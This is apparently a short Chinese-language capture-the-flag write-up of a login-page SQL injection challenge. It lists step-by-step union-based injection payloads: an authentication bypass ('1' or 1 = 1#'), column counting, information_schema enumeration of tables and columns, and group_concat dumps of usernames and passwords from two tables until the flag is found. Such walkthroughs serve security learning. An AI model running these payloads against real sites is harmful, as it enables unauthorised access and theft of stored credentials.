来看一道sql的题

随便写个用户名和密码

会有这样的提示

尝试一下sql注入，给了一点提示，不过什么都没解出来

万能语句：1' or 1 = 1#

看一下有几个字段

1' order by 4#

最终确定有3个字段

确定回显的时候发现有多个

确定回显位置：1' union select 1,2,3#

又给了一点提示，回显位置是2和3

来看一下数据库：

1' union select 1,database(),3#

爆破一下表名：

1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

可以得到2个表名

查询第一个表的字段：

1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#

查看字段的值：

1' union select 1,database(),group_concat(id,username,password) from geekuser#

里面的内容似乎没有什么作用

查询第二张表的字段：

1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

查看字段的值：

1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1#

果然有flag，不过一半在最左边，一半在最右边